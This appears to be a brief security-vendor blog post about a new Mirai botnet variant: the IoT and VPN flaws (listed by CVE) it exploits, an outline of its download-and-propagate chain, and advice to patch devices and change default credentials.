Security flaws in D-Link, Netgear, and SonicWall devices, among others, have been abused by a new variant of Mirai that has been recently discovered. Six known vulnerabilities have been targeted by this variant since February this month along with three previously unknown ones to infect systems and add them to a botnet network.
What Transpired?
Until now more than 60 variants have been observed that take advantage of known or unknown vulnerabilities in IoT devices. With some additional vulnerabilities targeting IoT devices, the attacks in recent times are based on a recent variant of Mirai’s source code.
- Known vulnerabilities in SonicWall SSL-VPN; D-Link DNS-320 firewall (CVE-2020-25506); Yealink Device Management (CVE-2021-27561 and CVE-2021-27562); Netgear ProSAFE Plus (CVE-2020-26919); Micro Focus Operation Bridge Reporter (CVE-2021-22502); and a Netis WF2419 router (CVE-2019-19356) are exploited by the botnet.
- Additionally, two RCE attacks – one targeting a command-injection vulnerability and the other targeting the Common Gateway Interface (CGI) along with some unidentified exploits are used by the botnet. The op_type parameter that leads to command injection was also targeted by another exploit.
Using Binaries –
The wget utility is used by the botnet after the initial infection to download a shell script from the malware’s infrastructure. Consequently, various Mirai binaries are downloaded and executed one-by-one by the shell script.
- Lolol[.]sh: To bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports, packet filter rules are created while deleting key folders from the target machine.
- Install[.]sh: Files and packages, such as GoLang v1.9.4, the – nbrute – binaries, and the combo[.]txt file that includes multiple credential combinations used for brute-forcing by – nbrute is downloaded.
- Dark.[arch]: By taking advantage of the initial Mirai exploits described above, it is mainly used for propagation means. Additionally, by using hardcoded credentials in the binary it can brute-force SSH connections.
One of the most important lessons learned from the Mirai botnet attack up to now is that unpatched connected devices are always a security risk. Hence, its highly important to regularly update and apply patches to IoT devices and firmware. Additionally, our internal experts suggest, changing the default credentials of IoT devices to stay protected from such attacks.
To read more, please check eScan Blog
